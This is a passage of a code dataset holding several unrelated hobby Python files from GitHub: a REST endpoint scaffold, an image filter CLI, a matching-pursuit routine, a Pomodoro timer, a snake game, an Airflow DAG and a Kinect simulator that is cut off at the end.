background=my_map,\n highlightcolor=my_map,\n highlightbackground=my_map,\n activeforeground=my_map,\n activebackground=my_map,\n disabledforeground=my_map,\n indicatoron=my_map,\n )\n\n def destroy(self):\n if self.timer is not None:\n self.timer.cancel()\n super(FlashCards, self).destroy()\n\n\nFlashCards().mainloop()\n\n\n# >>> a = [ [ str(a)+\"x\"+str(b)+\",\"+str(a * b) for a in range(0,100) if a*b <= 100] for b in range(0,100)]\n# >>> for x in a:\n# ... for y in x:\n# ...\n\n# >>> a = [ [ str(a)+\":\"+str(b)+\",\"+str(a/b)\n# for a in range(0,100) if a/b <= 100 and (a/b)*b == a ] for b in range(1,100)]\n# >>> for x in a:\n# ... for y in x:\n# ... print(y)\n# ...\n","repo_name":"jakubbaginski/pythonbootcamp","sub_path":"001-031 - TODO REFACTORING/Day 031 Flash Cards/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69914363572","text":"lista = []\nx = int(input())\ny = int(input())\nlista.append(x)\nlista.append(y)\nx = max(lista)\ny = min(lista)\n\nfor i in range((y + 1), x):\n if (i%5 == 2) or (i%5==3):\n sorted([i])\n print(i)\n ","repo_name":"luizgallas/uri_iniciante","sub_path":"1133.py","file_name":"1133.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72073004853","text":"import json\nfrom enum import Enum\n\nfrom aiohttp import web\nimport sqlalchemy as sa\n\n# TODO import apispec\nfrom aiohttp_security import permits\n\nclass RESTError(web.HTTPError):\n status_code = 500\n error = \"Unknown Error\"\n\n def __init__(self, message=None, status_code=None, **kwargs):\n\n if status_code is not None:\n self.status_code = status_code\n\n super().__init__(reason=message)\n if not message:\n message = self.error\n\n msg_dict = {\"error\": message}\n\n if kwargs:\n msg_dict['error_details'] = kwargs\n\n self.text = json.dumps(msg_dict)\n self.content_type = 'application/json'\n\nclass ForbiddenError(RESTError):\n status_code = 401\n error = \"Access denied\"\n\nclass NotFoundError(RESTError):\n status_code = 404\n error = \"Not found\"\n\nclass MethodNotAllowed(RESTError):\n status_code = 405\n error = \"Method not allowed\"\n\nclass BadRequest(RESTError):\n status_code = 400\n error = 'Bad request'\n\n\nasync def require(request, permission):\n has_perm = await permits(request, permission)\n if not has_perm:\n msg = 'User has no permission {}'.format(permission)\n raise ForbiddenError(msg)\n\nclass Endpoint:\n pool = None\n model = None\n schema = None\n lookup_field = 'id'\n lookup_regex = '\\d+'\n filters = []\n path = '/endpoint'\n\n def __init__(self, pool):\n self.pool = pool\n\n async def dispatch(self, request):\n method = request.method.lower()\n if not hasattr(self, method):\n raise MethodNotAllowed\n if 'id' not in request.match_info:\n method = 'list'\n return await getattr(self, method)(request, *request.match_info.values())\n\n async def get_object(self, object_id):\n async with self.pool.acquire() as conn:\n query = self.model.__table__.select().where(getattr(self.model, self.lookup_field) == object_id)\n row = await conn.execute(query)\n rec = await row.first()\n if not rec:\n raise NotFoundError\n return rec\n\n async def get(self, request, object_id):\n # await require(request, Permissions.view)\n rec = await self.get_object(object_id)\n return web.json_response(self.schema.dump(rec))\n\n async def list(self, request):\n # await require(request, Permissions.view)\n # def text_filter(query, value, table):\n # pairs = ((n, c) for n, c in table.c.items()\n # if isinstance(c.type, sa.sql.sqltypes.String))\n # sub_queries = []\n # for name, column in pairs:\n # do_compare = op(\"like\", column)\n # sub_queries.append(do_compare(column, value))\n #\n # query = query.where(or_(*sub_queries))\n # return query\n async with self.pool.acquire() as conn:\n query = self.model.__table__.select()\n count = await conn.scalar(\n sa.select([sa.func.count()]).select_from(query.alias('foo'))\n )\n # sort_dir = sa.asc if paging.sort_dir == ASC else sa.desc\n cursor = await conn.execute(query)\n # .offset(paging.offset)\n # .limit(paging.limit)\n # .order_by(sort_dir(paging.sort_field)))\n\n recs = await cursor.fetchall()\n headers = {'X-Total-Count': str(count)}\n return web.json_response(self.schema.dump(recs, many=True), headers=headers)\n\n async def post(self, request):\n # await require(request, Permissions.view)\n data = await request.json()\n errors = self.schema.validate(data)\n if errors:\n raise BadRequest(errors)\n async with self.pool.acquire() as conn:\n query = self.model.__table__.insert().values(data)\n rec = await conn.execute(query)\n await conn.execute('commit;')\n\n async def put(self, request, object_id):\n # await require(request, Permissions.edit)\n data = await request.json()\n rec = await self.get_object(object_id)\n errors = self.schema.validate(data)\n if errors:\n raise BadRequest(errors)\n async with self.pool.acquire() as conn:\n row = await conn.execute(\n self.model.__table__.update()\n .values(data))\n # .returning(*self.__table__.c)\n # .where(self._pk == entity_id))\n await conn.execute('commit;')\n\n async def patch(self, request, object_id):\n return await self.put(request, object_id)\n\n async def delete(self, request, object_id):\n # await require(request, Permissions.delete)\n async with self.pool.acquire() as conn:\n query = self.model.__table__.delete().where(getattr(self.model, self.lookup_field) == object_id)\n await conn.execute(query)\n # TODO: Think about autocommit by default\n await conn.execute('commit;')\n\n def setup_routes(self, router):\n router.add_route('*', f'{self.path}', self.dispatch)\n router.add_route('*', f'{self.path}/{{id}}', self.dispatch)\n\n\nimport marshmallow_sqlalchemy\nfrom aiopg.sa import create_engine\n\nimport sqlalchemy as sa\nfrom marshmallow_sqlalchemy import ModelSchema\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker, relationship, backref\n\nengine = sa.create_engine(\"postgres://127.0.0.1/test\")\nsession = scoped_session(sessionmaker(bind=engine))\nBase = declarative_base()\n\nclass Author(Base):\n __tablename__ = \"authors\"\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String)\n\n def __repr__(self):\n return \"\".format(self=self)\n\n\nclass AuthorSchema(ModelSchema):\n class Meta:\n model = Author\n transient = True\n\nBase.metadata.create_all(engine)\nauthor = Author(name=\"Chuck Paluhniuk\")\nsession.add(author)\nsession.commit()\nauthor = Author(name=\"Adolf Hitler\")\nsession.add(author)\nsession.commit()\n\nimport ipdb\nipdb.set_trace()\n\nclass Test(Endpoint):\n model = Author\n schema = AuthorSchema()\n path = '/test'\n\n\n\napp = web.Application()\nasync def on_startup(app):\n db = await create_engine(database='test')\n test = Test(db)\n test.setup_routes(app.router)\n\n# import ipdb\n# ipdb.set_trace()\n# aiohttp_autoreload.start()\napp.on_startup.append(on_startup)\nweb.run_app(app)\n\n","repo_name":"kotenev/aiorf","sub_path":"aiorf/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7965779126","text":"from typing import List\n\nfrom DAL.Manager import Manager\nfrom DTO.ReceiptDetails import ReceiptDetails\n\n\nclass ReceiptDetailsDAL(Manager):\n def __init__(self):\n super().__init__(\"receipt_details\", [\n \"RECEIPT_ID\",\n \"INGREDIENT_ID\",\n \"QUANTITY\",\n \"SUPPLIER_ID\"\n ])\n\n def convertToReceiptDetails(self, data: List[List[object]]) -> List[ReceiptDetails]:\n return self.convert(data, lambda row: ReceiptDetails(\n row['RECEIPT_ID'],\n row['INGREDIENT_ID'],\n row['QUANTITY'],\n row['SUPPLIER_ID']\n ))\n\n def addReceiptDetails(self, receiptDetails: ReceiptDetails) -> int:\n try:\n return self.create(\n receiptDetails.getReceiptID(),\n receiptDetails.getIngredientID(),\n receiptDetails.getQuantity(),\n receiptDetails.getSupplierID()\n ) # receiptDetails khi tạo mặc định deleted = 0\n except Exception as e:\n print(f\"Error occurred in ReceiptDetailsDAL.addReceiptDetails(): {e}\")\n return 0\n\n def searchReceiptDetails(self, *conditions: str) -> List[ReceiptDetails]:\n try:\n return self.convertToReceiptDetails(self.read(*conditions))\n except Exception as e:\n print(f\"Error occurred in ReceiptDetailsDAL.searchReceiptDetailss(): {e}\")\n return []\n","repo_name":"quangduy201/cafe-application","sub_path":"cafe_application/src/DAL/ReceiptDetailsDAL.py","file_name":"ReceiptDetailsDAL.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70067007414","text":"import time\nimport math\nfrom tkinter import *\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- #\n\n\ndef reset_timer():\n if timer is not None:\n window.after_cancel(timer)\n canvas.itemconfig(timer_text, text=f\"00:00\")\n timer_label.config(text=\"Timer\", fg=GREEN)\n check_label.config(text=\"\")\n global reps\n reps = 0\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\n\n\ndef count_down_trigger():\n global reps\n reps += 1\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n if reps % 8 == 0:\n timer_label.config(text=\"Break\", fg=RED)\n count_down(long_break_sec)\n elif reps % 2 == 0:\n timer_label.config(text=\"Break\", fg=PINK)\n count_down(short_break_sec)\n else:\n timer_label.config(text=\"Work\", fg=GREEN)\n count_down(work_sec)\n\n\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\n\n\ndef count_down(count):\n\n minutes = math.floor(count / 60)\n seconds = count % 60\n canvas.itemconfig(timer_text, text=f\"{minutes:02}:{seconds:02}\")\n if count > 0:\n global timer\n timer = window.after(1000, count_down, count - 1)\n else:\n count_down_trigger()\n marks = \"\"\n work_sessions = math.floor(reps/2)\n for _ in range(work_sessions):\n marks += \"✔\"\n check_label.config(text=marks)\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(fg=GREEN, bg=YELLOW, text=\"Timer\", font=(FONT_NAME, 35, \"bold\"))\ntimer_label.grid(row=0, column=1)\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(\n 100,\n 112,\n image=tomato_img\n)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(row=1, column=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, command=count_down_trigger)\nstart_button.grid(column=0, row=2)\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(column=2, row=2)\ncheck_label = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 20, \"bold\"))\ncheck_label.grid(column=1, row=3)\nwindow.mainloop()","repo_name":"AndreAppolariFilho/100_days_of_python","sub_path":"day_28_pomodora/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20812277453","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport airflow\nfrom datetime import datetime, timedelta\nfrom acme.operators.file_operators import FileToPredictableLocationOperator\nfrom acme.operators.file_operators import PredictableLocationToFinalLocationOperator\n\n\nseven_days_ago = datetime.combine(\n datetime.today() - timedelta(7),\n datetime.min.time())\n\nargs = {\n 'owner': 'airflow',\n 'start_date': seven_days_ago,\n 'provide_context': True\n}\n\ndag = airflow.DAG(\n 'file_ingest',\n schedule_interval=\"@daily\",\n dagrun_timeout=timedelta(minutes=60),\n default_args=args,\n max_active_runs=1)\n\npick_up_file = FileToPredictableLocationOperator(\n task_id='pick_up_file',\n src_conn_id='fs_source_system',\n dst_conn_id='fs_archive',\n file_mask=\"some_file_pattern_{{ ds_nodash }}\",\n dag=dag)\n\nload_file = PredictableLocationToFinalLocationOperator(\n task_id='load_file',\n src_conn_id='fs_archive',\n dst_conn_id='fs_target',\n src_task_id='pick_up_file',\n dag=dag)\n\npick_up_file >> load_file\n\n\nif __name__ == \"__main__\":\n dag.cli()\n","repo_name":"gtoonstra/etl-with-airflow","sub_path":"examples/file-ingest/file_ingest.py","file_name":"file_ingest.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1235,"dataset":"github-code","pt":"21"} +{"seq_id":"36927804002","text":"\"\"\"Monks challenge\"\"\"\nimport argparse\nimport logging\nimport sys\nimport uuid\nfrom pathlib import Path\n\nfrom PIL import Image\n\n\ndef im_has_alpha(img_arr):\n \"\"\"\n returns True for Image with alpha channel\n \"\"\"\n channel = img_arr.info.get(\"transparency\")\n return channel is not None\n\n\ndef overlay(i_overlay, output):\n \"\"\"\n overlay a given image on top of the source.\n \"\"\"\n try:\n overlay_image = Image.open(i_overlay)\n if not im_has_alpha(overlay_image):\n return None, \"the overlay image must be transparent . RGBA mode\"\n print(\"Overlaying this beautiful image with this amazing png\")\n output.paste(overlay_image.convert(\"RGBA\"),\n mask=overlay_image.convert(\"RGBA\"))\n overlay_image.close()\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? \")\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image input and a overlay image type?')\n return None, str(type_error)\n except OSError as os_error:\n print('Image format error')\n return None, str(os_error)\n except AttributeError as attribute_error:\n print('Did yo send two images?')\n return None, str(attribute_error)\n return output, None\n\n\ndef rotate(rotation, image):\n \"\"\"\n rotate N degrees.\n \"\"\"\n try:\n output = image.rotate(rotation)\n print(\"Changing to black and white\")\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? \")\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image type and a rotation int?')\n return None, str(type_error)\n except AttributeError as attribute_error:\n print('Did you send an image and a rotation int?')\n return None, str(attribute_error)\n return output, None\n\n\ndef gray_scale(image):\n \"\"\"\n convert the given image to black and white.\n \"\"\"\n try:\n output = image.convert('LA')\n print(\"Changing to black and white\")\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? \" + str(file_error))\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image to gray scale it?')\n return None, str(type_error)\n except OSError as os_error:\n print(\"I do not see a file here\" + str(os_error))\n return None, str(os_error)\n return output, None\n\n\ndef monks_filter(parser, options): # pylint: disable=too-many-branches\n \"\"\"\n Case arguments\n \"\"\"\n image = Image.new(mode=\"RGBA\", size=(0, 0))\n try:\n args = parser.parse_args(options)\n if args.input is None:\n return \"Missing image input\"\n original = Image.open(args.input)\n image = original.copy()\n original.close()\n error = None\n for option in options:\n if image is None:\n print(\"Something went wrong\")\n logging.exception(error)\n if option in \"-f\" or option in \"--file\":\n continue\n if option in \"-r\" or option in \"--rotate\":\n image, error = rotate(args.num, image)\n elif option in \"-o\" or option in \"--overlay\":\n image, error = overlay(args.filename, image)\n elif option in \"-g\" or option in \"--gray_scale\":\n image, error = gray_scale(image)\n elif option in \"-n\" or option in \"--name\" or option in \"-e\" or option in \"--extension\":\n continue\n elif isinstance(option, str) and args.name is not None or args.type \\\n is not None or args.num is not None:\n continue\n monks_filter_result = set_output(args, image)\n except ValueError as value_error:\n logging.error(str(value_error))\n monks_filter_result = \"I don't manage this kind of extension, \" \\\n \"you can send me jpg/png files if you want\"\n image.close()\n except AttributeError as attribute_error:\n logging.error(str(attribute_error))\n monks_filter_result = \"Missing parameters\"\n image.close()\n except FileNotFoundError as file_not_found:\n logging.error(str(file_not_found))\n monks_filter_result = \"I didn't find your file, are you sure you put the wright path?\"\n image.close()\n except BaseException as exception: # pylint: disable=broad-except\n logging.error(str(exception))\n monks_filter_result = \"Missing argument!\"\n image.close()\n return monks_filter_result\n\n\ndef set_output(arguments, image):\n \"\"\"\n Setting name image output and saving file\n :param arguments: parser\n :param image: image to save\n :return:\n \"\"\"\n name = str(uuid.uuid4())\n output_type = \"jpg\"\n directory = \"/tmp/images/\"\n if arguments.name is not None and isinstance(arguments.name, str):\n name = arguments.name\n if arguments.type is not None and \"jpg\" in arguments.type or \"png\" in arguments.type:\n output_type = arguments.type\n if arguments.directory is not None and isinstance(arguments.directory, str):\n directory = arguments.directory\n Path(directory).mkdir(parents=True, exist_ok=True)\n image.convert('RGB').save(directory + name + \".\" + output_type)\n image.close()\n return 'OUTPUT:' + directory + name + \".\" + output_type\n\n\ndef create_parser():\n \"\"\"\n Creates the parser with the options for the user\n :return: Parser object\n \"\"\"\n parser_args = argparse.ArgumentParser(description='Process images according to the '\n 'selected filters')\n parser_args.add_argument('-f', '--file', action='store', dest='input',\n help='file to change')\n parser_args.add_argument(\"-r\", \"--rotate\", action='store', type=int, dest=\"num\",\n help=\"rotate an image\")\n parser_args.add_argument(\"-o\", \"--overlay\", action='store', dest=\"filename\",\n help=\"overlying the input image with an a transparent png image\")\n parser_args.add_argument(\"-g\", \"--gray_scale\", dest=\"grayscale\", action='store_true',\n help=\"changing to black and white.\")\n parser_args.add_argument(\"-e\", \"--extension\", dest=\"type\", action='store',\n help=\"choose your type output. It could be png or jpg\")\n parser_args.add_argument(\"-n\", \"--name_output\", dest=\"name\", action='store',\n help=\"choose your name output image. \"\n \"If you don't is going to be an uuid4 name\")\n parser_args.add_argument(\"-d\", \"--directory\", dest=\"directory\", action='store',\n help=\"choose where do you want to send the image. \"\n \"If you don't is going to be in /tmp/images/.\"\n \"Please send it with the / at the end\")\n return parser_args\n\n\nif __name__ == '__main__':\n print(\"Let see what we're going to do\")\n parser_arguments = create_parser()\n opts = sys.argv[1:]\n result = monks_filter(parser_arguments, opts)\n print(result)\n","repo_name":"julietavuan/monks-photo-filter","sub_path":"monks_filter.py","file_name":"monks_filter.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1030751990","text":"## Importations\nimport numpy as np\nimport math\nimport cmath\n\n## Constantes\nD2 = np.array([[1,1,2,5,0,0,3,-2,1,2,2,2],[0,-1,-1,1,0,0,5,0,2,2,7,-1],[1,1,1,5,1,2,2,1,1,1,1,5],[1,5,2,2,5,0,-4,5,1,5,0,0],[0,2,2,1,1,0,0,0,0,4,-1,-2],[-1,2,2,2,-2,-3,-4,1,1,1,1,0]])\nx1 = np.array([[4/3-math.sqrt(2)/2],[4/3+math.sqrt(2)/2],[2/3]])\nx2=np.array([[-10],[-10],[1],[21],[0],[9]])\neps=1e-6\nk_max=4000\n\n## Fonctions\n\n# Fonction colonne\n# Renvoie la ieme colonne dune matrice\ndef colonne(D,i):\n i = i-1 # Les tableaux commencent a 0 en python\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n Di = np.zeros((M,1))\n for k in range (0,M):\n Di[k] = D[k,i]\n return Di\n\n# Fonction choix_mk\n# Renvoie la position de l'atome cherche\ndef choix_mk(D,Rk):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n X = np.zeros((N,1))\n for j in range(0,N):\n col = colonne(D,j)\n colT = col.T\n X[j] = abs(np.dot(colT,Rk))/np.linalg.norm(col)\n print(X)\n for j in range(0,N):\n if (np.amax(X) == X[j]):\n mk = j\n return mk\n\n# Fonction mp\n# Algorithme du matching pursuit\ndef mp(D,kmax,eps,x0):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n alpha = np.zeros((N,1))\n Rk = x0\n P=[]\n x = 0\n k = 0\n while (k < kmax) & (np.linalg.norm(Rk) > eps):\n mk = choix_mk(D,Rk)\n P = [P,mk]\n print('Les atomes selectionnes : ')\n print(P)\n a = np.dot(Rk.T,colonne(D,mk))\n b = a / (np.linalg.norm(colonne(D,mk))**2)\n c = b * colonne(D,mk)\n x = x + c\n print('x = ')\n print(x)\n alpha[mk] = alpha[mk] + b\n Rk = Rk - c\n print('Norme de Rk = ')\n print(np.linalg.norm(Rk))\n k = k+1\n niter = k\n residu_final = np.linalg.norm(Rk)\n print('x=')\n print(x)\n print(\"Nombre d'iterations :\")\n print(niter)\n print('Residu final = ')\n print(residu_final)\n print('La reprssentation parcimonieuse alpha = ')\n print(alpha)\n\n# Fonction ajout_colonne_fin\n# Ajoute la ligne Di a la fin de la matrice D\ndef ajout_colonne_fin(D,Di):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n DD = np.zeros((M,N+1))\n for i in range(0,M):\n for j in range (0,N):\n DD[i,j] = D[i,j]\n for k in range(0,M):\n DD[k,N] = Di[k]\n return DD\n\n\n# Fonction omp\n# Algorithme de l'othogonal matching pursuit\ndef omp(D,kmax,eps,x):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n alpha=np.zeros((N,1))\n Rk = x\n P = []\n Dk = D\n k = 0\n while (k < kmax) & (np.linalg.norm(Rk) > eps):\n mk = choix_mk(D,Rk)\n P = [P,mk]\n Dk = ajout_colonne_fin(Dk,colonne(Dk,mk))\n zk = np.dot(np.linalg.pinv(Dk),x)\n print('zk=')\n print(zk)\n Rk = Rk - np.dot(Dk,zk)\n k = k+1\n niter = k\n residu_final = np.linalg.norm(Rk)\n alpha = zk\n print('x = ')\n print(x)\n print(\"Nombre d'iterations = \")\n print(niter)\n print('residu final = ')\n print(residu_final)\n print('La representation parcimonieuse alpha = ')\n print(alpha)\n\n## Affichage\nprint(omp(D2, k_max, eps, x2))","repo_name":"labatvalen/compressiveSensingIntroduction","sub_path":"cs_TD2.py","file_name":"cs_TD2.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73779193332","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.MarketPlace, name='marketplace'),\n path('/', views.VendorDetail, name='vendordetail'),\n\n # Add To Cart\n path('add_to_cart//', views.AddToCart, name='addtocart'),\n # Decrease Cart\n path('decrease_cart//', views.DecreaseCart, name='decreasecart'),\n #Delete Cart Item\n path('delete_cart//', views.DeleteCart, name='deletecart'),\n]","repo_name":"Asoliudeen1/foodOnline","sub_path":"marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10859686507","text":"# -*- coding: utf-8 -*-\n\nimport curses\nimport time\nfrom random import randint\n\n\n\ndirections = [curses.KEY_RIGHT, curses.KEY_LEFT, curses.KEY_UP, curses.KEY_DOWN]\n\n\nfield_dictionary = {-1: '/',\n\t\t\t\t\t0: ' ',\n\t\t\t\t\t1: '#',\n\t\t\t\t\t2: 'o',\n\t\t\t\t\t3: '0',\n\t\t\t\t\t4: 'w'}\n\n\nclass Field:\n\tdef __init__(self, height, width, snake):\n\t\tself.height = height\n\t\tself.width = width\n\t\tself.cells = [[0 for i in range(self.width+2)] for j in range(self.height+2)]\n\n\t\t#setting border\n\t\tfor j in range(self.height+2):\n\t\t\tself.cells[j][0] = -1\n\t\t\tself.cells[j][self.width+1] = -1\n\t\tfor i in range(1, self.width+1):\n\t\t\tself.cells[0][i] = -1\n\t\t\tself.cells[self.height+1][i] = -1\n\t\t\n\t\tself.food_gen(snake)\n\t\t\n\t\t\t \n\tdef clear_field(self):\n\t\tfor j in range(1, self.height+1):\n\t\t\tfor i in range(1, self.width+1):\n\t\t\t\tself.cells[j][i] = 0\t\t\n\t\treturn\n\n\n\tdef set_field(self, snake):\n\t\t# Setting field\n\t\tself.clear_field()\n\n\t\t#setting food\n\t\tself.cells[self.food[0]][self.food[1]] = 4\n\n\t\t# Setting body\n\t\tfor i in snake.body[1:]:\n\t\t\tif i in snake.eaten_food:\n\t\t\t\tself.cells[i[0]][i[1]] = 3 \n\t\t\telse:\n\t\t\t\tself.cells[i[0]][i[1]] = 2 \n\n\t\t# Setting head\n\t\tself.cells[snake.body[0][0]][snake.body[0][1]] = 1\n\n\n\tdef render(self, screen, snake, score):\n\t\t\n\t\tself.set_field(snake)\n\t\tscreen.clear()\n\t\tfor j in range(0, self.height+2):\n\t\t\tfor i in range(0, self.width+2):\n\t\t\t\tscreen.addstr(j, i, field_dictionary[self.cells[j][i]])\n\t\tscreen.addstr(24, 2, 'Your score: ' + str(score))\n\n\n\tdef food_gen(self, snake):\n\t\ta = [randint(1, self.height), randint(1, self.width)]\n\t\t#checking if generated food hit the body\n\t\twhile a in snake.body:\n\t\t\ta = [randint(1, self.height), randint(1, self.width)]\n\t\tself.food = a\n\n\nclass Snake:\n\tdef __init__(self, y, x, direction):\n\t\tself.body = [[y, x], [y, x-1], [y, x-2]]\n\t\tself.direction = direction\n\t\tself.eaten_food = []\n\n\tdef is_alive(self, field):\n\t\t#checking if snake hit the wall\n\t\tif (self.body[0][0] == 0) or (self.body[0][0] == field.height+1) or (self.body[0][1] == 0) or (self.body[0][1] == field.width+1):\n\t\t\treturn False\n\t\t#checking if snake hit itself\n\t\tif (self.body[0] in self.body[1:]):\n\t\t\treturn False\n\t\treturn True\n\n\n\tdef set_direction(self, key):\n\t\tif key == curses.KEY_LEFT and self.direction == curses.KEY_RIGHT:\n\t\t\treturn\n\t\tif key == curses.KEY_RIGHT and self.direction == curses.KEY_LEFT:\n\t\t\treturn\n\t\tif key == curses.KEY_UP and self.direction == curses.KEY_DOWN:\n\t\t\treturn\n\t\tif key == curses.KEY_DOWN and self.direction == curses.KEY_UP:\n\t\t\treturn \n\t\tself.direction = key\n\t\n\tdef move(self, field):\n\t\tdy = 0\n\t\tdx = 0\n\t\tif (self.direction == curses.KEY_UP):\n\t\t\tdy = -1\n\t\telif (self.direction == curses.KEY_DOWN):\n\t\t\tdy = 1\n\t\telif (self.direction == curses.KEY_LEFT):\n\t\t\tdx = -1\n\t\telif (self.direction == curses.KEY_RIGHT):\n\t\t\tdx = 1\n\t\telse:\n\t\t\treturn\n\n\t\ty = self.body[0][0] + dy\n\t\tx = self.body[0][1] + dx\n\n\t\t#checking if snake have just eaten food\n\t\tif [y, x] == field.food:\n\t\t\tself.eaten_food.append([y, x])\n\t\t\tfield.food_gen(self)\n\n\t\tself.body.insert(0, [y, x])\n\t\tself.body.pop()\n\n\t\t#checking if the length of the body should increase\n\t\tfor i in self.eaten_food:\n\t\t\tif i not in self.body:\n\t\t\t\tself.eaten_food.remove(i)\n\t\t\t\tself.body.append(i)\n\t\t\t\t# break # can be uncomment if snake will start lagging\n\t\t\t\n\ndef if_inc_score(snake):\n\treturn True if (len(snake.eaten_food) != 0) and (snake.eaten_food[0] == snake.body[0]) else False\n\t\t\n'''\ndef main(screen):\n\n\tscreen.timeout(1)\n\n\tsnake = Snake(5, 5, curses.KEY_RIGHT)\n\tfield = Field(20, 20, snake)\n\tsnake_is_alive = True\n\tscore = 0\n\n\twhile snake_is_alive:\n\t\tkey = screen.getch()\n\n\t\tif key in directions:\n\t\t\tsnake.set_direction(key)\n\t\t\n\t\tsnake.move(field)\n\n\t\tif if_inc_score(snake):\n\t\t\tscore +=1\n\t\t\t\n\t\tfield.render(screen, snake, score)\n\n\t\tif not(snake.is_alive(field)):\n\t\t\tsnake_is_alive = False\n\t\t\n\t\ttime.sleep(.4)\n\telse:\n\t\tscreen.timeout(-1)\n\t\tscreen.addstr(23, 2, 'Oops, you died. Press End to exit the game')\n\t\twhile (screen.getch() != curses.KEY_END):\n\t\t\tpass\n\t\t\n\nif __name__ == \"__main__\":\n\tcurses.wrapper(main)\n'''\n","repo_name":"galtshifter/TeamDev","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18522920673","text":"#!/usr/bin/env python3\n \nimport rclpy, cv2, numpy as np\n\nfrom rclpy.node import Node\n\nfrom geometry_msgs.msg import Pose\nfrom nav_msgs.msg import OccupancyGrid\nfrom sensor_msgs.msg import Image\nfrom tf_transformations import euler_from_quaternion\nfrom cv_bridge import CvBridge\n\ntry: # for ROS2 run and launch compatibility \n from .utils import CoordinateConverter\n from .rangefinder import build_pixel_rangefinder\n\nexcept ImportError: # for python3 run compatibility\n from utils import CoordinateConverter\n from rangefinder import build_pixel_rangefinder\n\n\nclass KinectSimulator(Node):\n\n def __init__(self):\n super().__init__('kinect_simulator')\n self.variable_init()\n self.connection_init()\n \n\n def variable_init(self):\n self.kinect_height = 0.3 # [m]\n self.wall_height = 0.5 # [m]\n self.max_depth = 10.0 # [m]\n self.hfov = 57*np.pi/180.0 # [rad] (57 [degrees])\n self.vfov = 43*np.pi/180.0 # [rad] (43 [degrees])\n self.view_depth = 4.0 # [m]\n self.min_valid_distance = 0.45 # [m]\n \n self.depth_img_width = 640 # [pix]\n self.depth_img_height = 480 # [pix]\n self.map_resolution = 0.01 # [m/pix]\n\n self.n_h_scans = 50\n self.n_v_scans = int((self.depth_img_height * self.n_h_scans) / self.depth_img_width)\n self.view_depth_pix = self.view_depth / self.map_resolution # [pix]\n self.h_beam_angles = np.linspace(self.hfov/2.0, -self.hfov/2.0, self.n_h_scans)\n 